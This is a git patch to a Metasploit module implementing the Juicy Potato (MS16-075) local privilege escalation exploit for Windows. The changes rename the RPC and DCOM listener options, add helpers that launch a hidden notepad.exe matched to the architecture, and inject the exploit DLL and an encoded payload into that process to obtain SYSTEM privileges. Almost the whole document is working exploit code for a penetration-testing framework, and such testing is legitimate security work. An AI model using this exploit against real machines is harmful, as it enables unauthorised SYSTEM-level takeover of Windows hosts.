From 3a865a0c0555a0a92dce29bed248bfc02926d3b5 Mon Sep 17 00:00:00 2001 From: phra Date: Sat, 12 Jan 2019 04:03:26 +0100 Subject: [PATCH] feat: spawn as NT AUTHORITY\SYSTEM --- .../local/ms16_075_reflection_juicy.rb | 91 +++++++++++-------- 1 file changed, 53 insertions(+), 38 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb index 31ef7a7ead..bc6e4ccaea 100644 --- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb +++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb @@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Local 'breenmachine', # Rotten Potato NG! 'decoder', # Lonely / Juicy Potato 'ohpe', # Juicy Potato - 'phra' # MSF Module + 'phra', # MSF Module + 'lupman' # MSF Module ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', @@ -38,14 +39,13 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'EXITFUNC' => 'none', - 'WfsDelay' => '0', - 'DisablePayloadHandler' => 'true' + 'WfsDelay' => '20' }, 'Targets' => [ - ['Automatic', {}], - ['Windows x86', { 'Arch' => ARCH_X86 }], - ['Windows x64', { 'Arch' => ARCH_X64 }] + ['Automatic', {}] + #['Windows x86', { 'Arch' => ARCH_X86 }], + #['Windows x64', { 'Arch' => ARCH_X64 }] ], 'Payload' => { @@ -67,16 +67,16 @@ class MetasploitModule < Msf::Exploit::Local register_options( [ - OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]), - OptPort.new('DCOM_PORT', [ true, 'Set listening port for MITM DCOM communication', 6666 ]) + OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]) ]) register_advanced_options( [ - OptAddress.new('RPC_IP', [ true, 'Set RPC_IP value', '127.0.0.1' ]), - OptPort.new('RPC_PORT', [ true, 'Set RPC_PORT value', 135 ]), - OptAddress.new('DCOM_IP', [ true, 'Set DCOM_IP value', '127.0.0.1' ]), - OptString.new('LOGFILE', [ false, 'Set the log file' ]), + OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]), + OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]), + OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]), + OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]), + OptString.new('LogFile', [ false, 'Set the log file' ]) ]) end @@ -98,17 +98,35 @@ class MetasploitModule < Msf::Exploit::Local return my_target end - def verify_arch(my_target) - if my_target["Arch"] != sysinfo["Architecture"] - print_error("Assigned Target Arch = #{my_target.opts['Arch']}") - print_error("Actual Target Arch = #{sysinfo['Architecture']}") - fail_with(Failure::BadConfig, "Assigned Arch does not match reality") - end - if client.arch != sysinfo["Architecture"] - fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported") + # Creates a temp notepad.exe to inject payload in to given the payload + def create_temp_proc() + windir = client.sys.config.getenv('windir') + # Select path of executable to run depending the architecture + if sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64 + cmd = "#{windir}\\Sysnative\\notepad.exe" + elsif sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86 + cmd = "#{windir}\\SysWOW64\\notepad.exe" else - vprint_good("Current payload and target Arch match....") + cmd = "#{windir}\\System32\\notepad.exe" end + begin + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true}) + rescue Rex::Post::Meterpreter::RequestError + return nil + end + + return proc + end + + def create_temp_proc_stage2() + windir = client.sys.config.getenv('windir') + # Select path of executable to run depending the architecture + if sysinfo["Architecture"] == ARCH_X64 and @payload_arch.first == ARCH_X86 + cmd = "#{windir}\\SysWOW64\\notepad.exe" + else + cmd = "#{windir}\\System32\\notepad.exe" + end + return cmd end def check @@ -124,9 +142,6 @@ class MetasploitModule < Msf::Exploit::Local if privs.include?('SeImpersonatePrivilege') return Exploit::CheckCode::Appears end - if privs.include?('SeAssignPrimaryToken') - return Exploit::CheckCode::Appears - end return Exploit::CheckCode::Safe end @@ -134,24 +149,24 @@ class MetasploitModule < Msf::Exploit::Local if is_system? fail_with(Failure::None, 'Session is already elevated') end + @payload_name = datastore['PAYLOAD'] + @payload_arch = framework.payloads.create(@payload_name).arch my_target = assign_target - print_status("#{my_target['Arch']}") - verify_arch(my_target) if check == Exploit::CheckCode::Safe - fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported') + fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege') end - if my_target.opts['Arch'] == 'x64' + if @payload_arch.first == ARCH_X64 dll_file_name = 'juicypotato.x64.dll' vprint_status("Assigning payload juicypotato.x64.dll") - elsif my_target.opts['Arch'] == 'x86' + elsif @payload_arch.first == ARCH_X86 dll_file_name = 'juicypotato.x86.dll' vprint_status("Assigning payload juicypotato.x86.dll") else fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code") end print_status('Launching notepad to host the exploit...') - notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) - #notepad_process = client.sys.process.execute('cmd.exe', nil, 'Hidden' => true) + notepad_process = create_temp_proc + cmd = create_temp_proc_stage2 begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") @@ -165,13 +180,13 @@ class MetasploitModule < Msf::Exploit::Local print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting exploit configuration into #{process.pid}...") - #payload_mem = inject_into_process(process, payload.encoded) - configuration = "#{datastore['LOGFILE']}\x00" + configuration = "#{datastore['LogFile']}\x00" + configuration += "#{cmd}\x00" configuration += "#{datastore['CLSID']}\x00" - configuration += "#{datastore['DCOM_PORT']}\x00" - configuration += "#{datastore['RPC_IP']}\x00" - configuration += "#{datastore['RPC_PORT']}\x00" - configuration += "#{datastore['DCOM_IP']}\x00" + configuration += "#{datastore['ListeningPort']}\x00" + configuration += "#{datastore['RpcServerHost']}\x00" + configuration += "#{datastore['RpcServerPort']}\x00" + configuration += "#{datastore['ListeningAddress']}\x00" configuration += "#{payload.encoded.length}\x00" configuration += payload.encoded payload_mem = inject_into_process(process, configuration) @@ -179,6 +194,6 @@ class MetasploitModule < Msf::Exploit::Local # we want invoked on successful exploitation. print_status('Configuration injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) - print_good('Exploit finished, check incognito module.') + print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end